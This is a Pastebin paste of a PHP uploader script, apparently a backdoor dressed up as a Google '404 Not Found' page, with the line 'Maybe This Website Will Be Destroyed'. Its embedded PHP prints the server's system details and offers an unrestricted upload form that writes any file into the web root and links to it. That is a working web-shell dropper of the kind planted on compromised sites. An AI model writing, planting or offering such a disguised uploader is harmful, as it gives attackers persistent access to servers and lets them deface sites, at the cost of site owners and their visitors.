caesarevan

Untitled

Jul 6th, 2018
149
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.26 KB | None | 0 0
  1. <!DOCTYPE HTML>
  2. <html>
  3. <head>
  4. <title><!- _U_P_L_O_A_D_E_R_ -></title>
  5. <!-- Evan Uploader -->
  6. <style type="text/css">
  7. html {
  8. margin: 20px auto;
  9. background: #FFFFFF;
  10. color: grey;
  11. text-align: center;
  12. }
  13. header {
  14. color: grey;
  15. margin: 10px auto;
  16. }
  17. {
  18. width: 200px;
  19. height: 20px;
  20. color: grey;
  21. background: transparent;
  22. border: 1px dotted grey;
  23. margin-left: 20px;
  24. text-align: center;
  25. }
  26. </style>
  27. </head>
  28. <center>
  29. <header>
  30. <pre>
  31. <!DOCTYPE html>
  32. <html lang=en>
  33. <meta charset=utf-8>
  34. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
  35. <title>Error 404 (Not Found)</title>
  36. <link rel="icon" type="png/gif" href="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png">
  37. <input class="gsfi" id="lst-ib" maxlength="2048" name="q" autocomplete="off" title="Telusuri" value="" aria-label="Cari" aria-haspopup="false" role="combobox" aria-autocomplete="list" style="border: medium none; padding: 0px; margin: 0px; height: auto; width: 10%; background: transparent url(&quot;data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw%3D%3D&quot;) repeat scroll 0% 0%; position: absolute; z-index: 6; left: 0px; outline: medium none currentcolor;" dir="ltr" spellcheck="false" type="text">
  38. <img src="https://images.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png">
  39. <p><b>404. | Maybe This Website Will Be Destroyed</b>
  40.  
  41. </pre>
  42. <?php
  43. echo "<b>".php_uname()."</b><br>";
  44. echo "<form method='post' enctype='multipart/form-data'>
  45. <input type='file' name='cl4y_file'>
  46. <input type='submit' name='Google' value='Google'>
  47. </form>";
  48. $root = $_SERVER['DOCUMENT_ROOT'];
  49. $files = $_FILES['cl4y_file']['name'];
  50. $dest = $root.'/'.$files;
  51. if(isset($_POST['Google'])) {
  52. if(is_writable($root)) {
  53. if(@copy($_FILES['cl4y_file']['tmp_name'], $dest)) {
  54. $web = "http://".$_SERVER['HTTP_HOST']."/";
  55. echo "Google! <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
  56. } else {
  57. echo "Dont Cry :) ";
  58. }
  59. } else {
  60. if(@copy($_FILES['cl4y_file']['tmp_name'], $files)) {
  61. echo "upload sukses!! <b>$files</b> di folder ini";
  62. } else {
  63. echo "upload gagal!!";
  64. }
  65. }
  66. }
  67. ?>
  68. </center>
Add Comment
Please, Sign In to add comment